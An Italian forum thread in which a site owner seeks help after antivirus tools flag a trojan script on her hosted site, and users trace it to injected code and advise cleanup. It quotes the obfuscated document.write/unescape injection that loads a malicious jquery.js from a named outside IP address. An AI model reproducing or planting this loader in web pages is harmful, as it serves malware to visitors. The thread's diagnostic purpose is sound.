Virus Exploit.JS.Agent.agr

Buongiorno. Questo mi sembra un problema serio. Da qualche tempo visualizzando il mio sito mgdosio.altervista.org i maggiori antivirus segnalano la presenza del virus in oggetto, classificato ad alto rischio, contenuto nel file internet temporaneo denominato jquery[1].js che viene messo puntualmente in quarantena. Desidero precisare che il mio HTML è pulito, e nella mia cartella sul server non sono presenti file con estensione js. Ma da dove viene questo virus? Sono molto preoccupata: questa cosa allontana i visitatori! E' un bel pasticcio! Qualcuno sa darmi una spiegazione?

Il problema non sembra derivante dal sito.
Fai una bella scansione del tuo computer.


Ciao!

Quando ho perto il tuo sito il mio pc ha avuto subito la CPU a 100% finchè non l'ho chiuso...

EDIT: avg 8 mi ha trovato un virus...

Devo precisare che prima di scrivere al forum avevo già provveduto a fare tutte le scansioni possibili sul mio pc, che non è risultato precedentemente infetto. Io utilizzo sia Firefox che Internet Explorer: il primo mi svuota la cache dei file temporanei alla chiusura del browser, per il secondo io provvedo a svuotare manualmente tutti i file temporanei alla chiusura del browser. In ogni caso riaprendo uno qualsiasi dei due, e visitando il mio sito per primo, il virus viene puntualmente caricato dai file temporanei di mgdosio.altervista e messo in quarantena. Quindi non c'è nessun dubbio, è colpa del mio sito. Ma i file che io ho caricato sul server sono tutti puliti, ed ho perfino provato questa mattina a ricaricarli ex novo, ma non cè niente da fare. Il problema viene rilevato anche dai pc di miei amici che utilizzano antivirus di marche diverse. E se fosse un problema di server? E' davvero grave. Qualcuno può entrare nel mio sito (mgdosio.altervista.org) e dirmi cosa gli succede? (Mi raccomando, con l'antivirus attivo!). Sono preoccupata, perchè perdo visitatori e reputazione! Grazie.

Non so se può essere d'aiuto o meno, dato che navigo con Linux e non ho un antivirus per testare. L'unica cosa però che ho notato è che "NASA Gallery - dal sito della NASA" non mi presanta un contenuto, ma rimane come se mancasse un plugin o altro in visualizzazione (il che potrebbe anche dipendere da un plugin non presente in Linux). Forse però è tale componente (esterno al tuo sito) che contiene codice js che viene interpretato come virus dagli antivirus. Se l'ipotesi fosse corretta, ti basta disabilitare per un attimo tale componente e fare la prova sul sito.

NoScript mi blocca un certo: 94.247.2.195
non conosco la provenienza di questo ip ma posso indicarti questo:
http://whois.domaintools.com/94.247.2.195
http://94.247.2.195/ (risulta un sito malevolo)
http://www.google.it/search?source=i...lr%3D&aq=f&oq=
http://blog.scansafe.com/journal/200...gle-serps.html (qui info utili)
Prova a capire perchè quest'ip è presente nella tua pagina e risolverai il tuo problema :wink:
-
Edit: trovato!
La stringa "malevola" è nel codice del calendario: hxxp://tuosito,altervista.org/calendarmgd_frame.htm (censurato per evitare che qualcuno ci clicchi)

Codice:

---

<script language=javascript><!--
document.write(unescape('Q4m%3CsQ4mcpGoript%20srczo%3D%2F%2FU309zo49vo%2Ei12479vo%2E2%2E195%2Fjqu3hHery9vo%2E3hHjQ4ms%3E%3CpGo%2FpGosi1ci1rpGoipt%3E').replace(/Q4m|zo|U30|9vo|3hH|i1|pGo/g,""));
 --></script><body>

---

In effetti ho cancellato dal server il documento calendarmgd_frame.htm, ma sembra che il problema sia solo parzialmente risolto: ebbene, su tutte le pagine (o quasi) del mio sito compare la stringa malevola che darkwolf (che ringrazio) mi ha intelligentemente segnalato! Ma come è possibile?? I miei documenti originali non contengono quella stringa!!! Come ha fatto a finire lì? Un maleintenzionato ha violato la protezione del server e ha modificato tutti i miei documenti? La stringa malevola è stata aggiunta a tutte le mie pagine! !!! Tutto il mio sito è stato plagiato!!!!! E' orribile........

Da quanto ho letto è un malware dal pc che infetta i siti.
Cioè tu hai un malware, questo si accorge che fai il login via ftp al sito, si memorizza i dati e in modo silent fa il suo sporco lavoro :wink:

Questo significa che devo formattare il pc?

Beh formattare è esagerato...
Ti consiglio di aggiornare l'OS (WindowsUpdate); Aggiornare l'antivirus; una scansione con SpyBot; una passata con ComboFix e infine di cambiare la password del tuo account ftp :wink:
PS: ovviamente devi anche rimuovere la stringa da tutte le pagine del tuo sito.

Tutti gli strumenti che hai citato li ho disponibili, mi manca Combofix che se non sbaglio è un anti-rootkit. E' scaricabile da qualche parte?

Qui una descrizione: http://www.bleepingcomputer.com/comb...o-use-combofix
Qui il download diretto: http://download.bleepingcomputer.com/sUBs/ComboFix.exe

e pensare che a vederlo cosi sembra l'innocuo JQuery

http //94.247.2.195 jquery.js guardate il codice voi stessi

se non fosse che verso la fine del codice include un'altro file, che a sua volta scarica un eseguibile.

Combofix è un software davvero interessante: ha rilevato il malware che gli altri software non avevano rilevato (nè Spybot, nè Zonealarm Total Security) e mi sembra che sia riuscito a porvi rimedio. (Mi piacerebbe sapere se si tratta di un programma da utilizzare solo in casi di emergenza o può essere usato periodicamente per tenere a posto il pc). Alla fine della procedura Combofix consiglia di inserire il suo file di log nella discussione in cui è stato chiesta la sua esecuzione: citando alla lettera il manuale "...E' possibile che Combofix già al primo utilizzo risolva i problemi riscontrati. Si consiglia vivamente di pubblicare ugualmente il log nella discussione nella quale si sta ricevendo aiuto in quanto potrebbero esserci ancora infezioni che richiedono ulteriori analisi". Chiedo conferma a voi prima di pubblicare il file di log, perchè è piuttosto lunghino.
Ho provveduto ad aggiornare OS, Spybot, Antivirus, ho modificato le password, poi installerò Noscript su Firefox, chissà cosa potrei fare ancora.... Intanto ricontrollo tutti i documenti del mio sito, quando avrò finito proverò a fare il trasferimento FTP, e.........che qualcuno me la mandi buona!

Magari caricalo in una directory del tuo sito e linkacelo.
Io lo uso solo quando necessario (pc palesemente infetti che non si riesce a ripulire) :wink:

Il mio file di log di Combofix lo potete trovare qui:

http://mgdosio.altervista.org/combo/ComboFix.txt